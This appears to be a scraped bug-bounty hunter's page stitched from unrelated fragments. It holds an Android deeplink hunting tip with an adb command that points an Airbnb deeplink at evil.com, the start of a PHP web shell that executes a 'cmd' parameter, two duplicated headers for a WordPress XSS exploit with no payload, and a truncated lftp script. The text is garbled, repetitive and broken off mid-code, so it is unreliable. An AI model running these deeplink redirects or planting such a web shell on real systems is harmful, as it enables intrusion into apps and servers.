Sathish Kumar sathishshan

You must love #Android deeplinks! They are the easiest way to get bounties

Decompile an app with jadx
Collect all deeplink handlers from AndroidManifest.xml, they look like
Grep among all sources and resources a pattern from a handler, in this case, airbnb://d
You could find a lot of hardcoded urls like airbnb://d/openurl?url=https:// http://airbnb.com/blabla. That's much simpler than learning app's sources
Now try to put your own domains with adb (adb shell am start -a android.intent.action.VIEW -d airbnb://d/openurl?url=http:// http://evil.com) or on HTML pages (check out the H1 report below)
Repeat the same thing for iOS apps. Usually, functionality is similar, but actual implementations are different

the above two mail addres is same

	<html>
	<body>
	<form method="GET" name="<?php echo basename($_SERVER['PHP_SELF']); ?>">
	<input type="TEXT" name="cmd" id="cmd" size="80">
	<input type="SUBMIT" value="Execute">
	</form>
	<pre>
	<?php
	if($_GET['cmd'])
	{

	# Exploit Title: Rencontre Wordpress plugin - Authenticated Stored XSS
	# Date: 04/08/2019
	# Exploit Author: Sathishshan
	# Version: <= 3.1.3
	# Vendor Homepage: Recontre
	# Software Link: https://wordpress.org/plugins/rencontre/
	# Tested on: Ubuntu-server 18.0.* OS
	# Category : Webapps

	# Description

	# Exploit Title: Rencontre Wordpress plugin - Authenticated Stored XSS
	# Date: 03/08/2019
	# Exploit Author: Sathishshan
	# Version: <= 3.1.3
	# Vendor Homepage: Recontre
	# Software Link: https://wordpress.org/plugins/rencontre/
	# Tested on: Ubuntu-server 18.0.* OS
	# Category : Webapps

	# Description

	# General mirror

	USER=""
	PASSWORD=""
	HOST=""
	REMOTE_DIR=""
	LOCAL_DIR=""

	lftp -u "$USER","$PASSWORD" $HOST <<EOF
	# the next 3 lines put you in ftpes mode. Uncomment if you are having trouble connecting.